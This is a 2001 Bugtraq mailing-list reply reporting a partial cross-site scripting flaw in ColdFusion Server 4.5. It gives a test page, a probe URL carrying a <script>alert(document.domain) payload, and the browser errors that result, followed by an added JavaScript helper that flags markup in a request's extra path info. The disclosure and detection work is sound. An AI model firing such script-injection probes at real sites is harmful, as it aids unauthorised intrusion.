Bugtraq mailing list archives
RE: Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
From: "Cook, Justin S. (Schmidt)" <JSCook () schmidt com>
Date: Tue, 3 Jul 2001 07:47:14 -0500
This same vulnerability seems to be partially evident for CFServer (at least
version 4.5).
Using the following code:
default.cfm
-----------
<html>
<head>
<title>CFML Cross-site Scripting Vulnerability Testing</title>
<script language="javascript" src="extra.js"></script>
</head>
</html>
extra.js
---------
/* does nothing */
function foo() {
var bar="foo";
return bar;
}
If you do a request in your browser for
http://domain/default.cfm/<script>alert(document.domain)
You can see that the JS is at least partially interpreted because it shows
up in the IE errors. If viewed in Netscape, you see that there is a syntax
error with the first tag (in this case <html>).
IE Error:
Line: 4
Char: 1
Error: Syntax Error
Code: 0
URL: http://domain/default.cfm/<script>alert(document.domain)
NS 4.7 Error:
JavaScript Error:
http://domain/default.cfm/extra.js,
line 3:
syntax error.
<html>
^
Quite odd results actually. It only seems to work when you call out for an
external javascript file.
Justin Cook
Work: jscook () schmidt com
Home: jsc () themes org / jcook () k-lug org
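
The Netscape error in the message above names http://domain/default.cfm/extra.js as the script URL. The following is an added example, not part of the original post, showing how a browser resolves the relative src="extra.js" against the requested URL and how a request with extra path info after a .cfm page can be flagged. Function names are hypothetical, and it assumes the server hands any /default.cfm/... path to default.cfm, which the quoted error is consistent with.

```javascript
"use strict";

const PAGE_EXTENSIONS = [".cfm"]; // dynamic-page suffixes to look for

// Split a URL path into the page (up to and including the first segment
// ending in a page extension) and whatever extra path info follows it.
function splitPathInfo(url) {
  const segments = new URL(url).pathname.split("/");
  const idx = segments.findIndex((s) =>
    PAGE_EXTENSIONS.some((ext) => s.toLowerCase().endsWith(ext)));
  if (idx === -1) return null;
  return {
    page: segments.slice(0, idx + 1).join("/"),
    extra: segments.slice(idx + 1).join("/"),
  };
}

// Percent-decode for inspection; keep the raw text if it is malformed.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function reviewRequest(requestUrl, relativeSrcs) {
  const req = splitPathInfo(requestUrl);
  const extra = req ? safeDecode(req.extra) : "";
  // Browsers resolve relative src values against the requested URL.
  const resolved = relativeSrcs.map((src) => new URL(src, requestUrl).href);
  // A subresource whose path still runs through the same page is assumed
  // to be answered by that page (HTML) instead of the intended file.
  const misrouted = resolved.filter((href) => {
    const sub = splitPathInfo(href);
    return req !== null && sub !== null &&
      sub.page === req.page && sub.extra !== "";
  });
  return { extra, markupInPath: /[<>]/.test(extra), resolved, misrouted };
}

// Constructed sample input, using the URL and script name from the post.
const sample = reviewRequest(
  "http://domain/default.cfm/<script>alert(document.domain)", ["extra.js"]);
console.log(sample);
```
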
